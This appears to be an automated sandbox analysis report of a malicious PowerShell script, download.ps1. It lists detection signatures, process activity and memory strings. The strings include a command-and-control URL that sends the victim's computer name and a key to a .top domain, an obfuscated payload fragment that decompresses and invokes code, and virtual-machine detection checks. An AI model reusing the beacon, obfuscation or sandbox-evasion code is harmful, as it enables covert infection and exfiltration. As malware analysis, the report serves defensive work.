
Windows Analysis Report
download.ps1

Overview

General Information

Sample name: download.ps1
Analysis ID: 1578248
MD5: f91e3c78bfc0cc41330d65764455a851
SHA1: 294c15d09a7df4d91e891d7ca3bc2803c8262ce1
SHA256: 3cef01524b94194e6e6834746b8215ebdd4b51c29e92187d6e59e8be1b365934

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Loading BitLocker PowerShell Module
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • powershell.exe (PID: 7452 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
No configs have been found
No yara matches
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5068, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 7452, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5068, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 7452, ProcessName: powershell.exe
No Suricata rule has matched


AV Detection

Source: http://cmacnnkfbhlcncm.top; Avira URL Cloud: Label: malware
Source: download.ps1; Virustotal: Detection: 8%
Source: Binary string: ion.pdbcyTk source: powershell.exe, 00000000.00000002.41066212714.0000026EAAC62000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 00000000.00000002.41066212714.0000026EAAC62000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.41030903631.0000026E907A3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.41066212714.0000026EAAD8F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb} source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdbQ source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.41066212714.0000026EAAC62000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbOypk source: powershell.exe, 00000000.00000002.41066212714.0000026EAAC62000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: gement.Automation.pdbnSS% source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.41066212714.0000026EAAD8F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbo source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbq source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbj source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: global traffic; DNS traffic detected: DNS query: cmacnnkfbhlcncm.top
Source: powershell.exe, 00000000.00000002.41032039963.0000026E93B0F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://$jp1hlsae28owqrv/$nkg635ix9hrwbzc.php?
Source: powershell.exe, 00000000.00000002.41032039963.0000026E93B0F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://$jp1hlsae28owqrv/$nkg635ix9hrwbzc.php?id=$env:computername&key=$ijkcxgoqtupsma&s=527
Source: powershell.exe, 00000000.00000002.41032039963.0000026E93A8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.41032039963.0000026E934F7000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://cmacnnkfbhlcncm.top
Source: powershell.exe, 00000000.00000002.41032039963.0000026E93A8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.41032039963.0000026E934F7000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://cmacnnkfbhlcncm.top/9ciszeq80lhtr.php?id=computer&key=15935922840&s=527
Source: powershell.exe, 00000000.00000002.41032039963.0000026E93A8D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://cmacnnkfbhlcncm.top/9ciszeq80lhtr.php?id=computer&key=15935922840&s=527p
Source: powershell.exe, 00000000.00000002.41064416025.0000026EAA920000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000000.00000002.41064416025.0000026EAA920000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000000.00000002.41065685822.0000026EAAA40000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.micr
Source: powershell.exe, 00000000.00000002.41058553820.0000026EA2994000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92921000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
Source: powershell.exe, 00000000.00000002.41064416025.0000026EAA920000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92921000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.41058553820.0000026EA2994000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.41058553820.0000026EA2994000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.41058553820.0000026EA2994000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/PesterXz
Source: powershell.exe, 00000000.00000002.41032039963.0000026E94AEA000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.41058553820.0000026EA2994000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.41064416025.0000026EAA920000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 0_2_00007FF8D1B28B32 0_2_00007FF8D1B28B32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 0_2_00007FF8D1B27D86 0_2_00007FF8D1B27D86
Source: classification engine; Classification label: mal68.evad.winPS1@2/7@2/0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Mutant created: NULL
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_drm1igxw.dvr.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $049h8rxnvqfbt27.(([system.String]::new(@((235505/(16643525/4735)),(238317/(5977248/2784)),(-9346+(1827+(7527+(-5188+5292)))),(-4857+(-770+(3789+(-4097+(11413-(734+(9380-(5285027/1111)))))))),(6501-(15043-(537+8089))),(-3722+3833)))))( $sgvhtey7i8axq3r ) $049h8rxnvqfbt27.(([system.String]::new(@((279926/4178),(56484/(2982-(2132+(-7110+(10569-(-4136+(1930+(-733+(10266061/(12158290/(3350540/(4170234/8949)))))))))))),(2320-(717925/325)),(9204-9089),(-9836+9937)))))()$0lu51qr8owa9zh37ywckn3xdhbuie.(([system.String]::new(@((6297-6230),(-8043+8151),(353646/(12145032/(11016-(10521-3317)))),(-212+327),(970610/(17833-8223))))))()[byte[]] $ioj8fg7y3huk5a6 = $sgvhtey7i8axq3r.(([system.String]::new(@((-8712+(9714-918)),(629481/5671),(-6254+6319),(4095-3981),(1024860/(-1084+10074)),(10114-10017),(847847/7007)))))() $uykm374xtfghd2z=$ioj8fg7y3huk5a6 return $uykm374xtfghd2z}[System.Text.Encoding]::ascii.((-join (@((216337/(4948328/1624)),(683265/(-976+(7321+420))),(4552-4436),(-855+(4385150/4675)),(760148/6553),(-6942+(373+6683)),(8509-8404),(766590/6969),(6417-(64364916/10194)))| ForEach-Object { [char]$_ })))((nvgh3e65mupyqljs8obki24acw1 "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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 0_2_00007FF8D19FD2A5 pushad ; iretd 0_2_00007FF8D19FD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 0_2_00007FF8D1B12293 pushad ; iretd 0_2_00007FF8D1B1232D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 0_2_00007FF8D1B1B1ED push ebx; retf 0_2_00007FF8D1B1B212
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 0_2_00007FF8D1B1B312 pushad ; retf 0_2_00007FF8D1B1B321
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 0_2_00007FF8D1B166D3 push F8D1CFD2h; iretd 0_2_00007FF8D1B1681A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 0_2_00007FF8D1B156EB push F8D1CFB8h; iretd 0_2_00007FF8D1B15A7A

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 9942
Source: powershell.exe, 00000000.00000002.41032039963.0000026E934F7000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: VMware
Source: powershell.exe, 00000000.00000002.41066212714.0000026EAAD8F000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus
Source: powershell.exe, 00000000.00000002.41066212714.0000026EAAD8F000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
Source: powershell.exe, 00000000.00000002.41066212714.0000026EAAC2D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.41032039963.0000026E934F7000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.41066212714.0000026EAAC2D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: booleanIsVirtualMachine
Source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000000.00000002.41032039963.0000026E934F7000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: vmware8
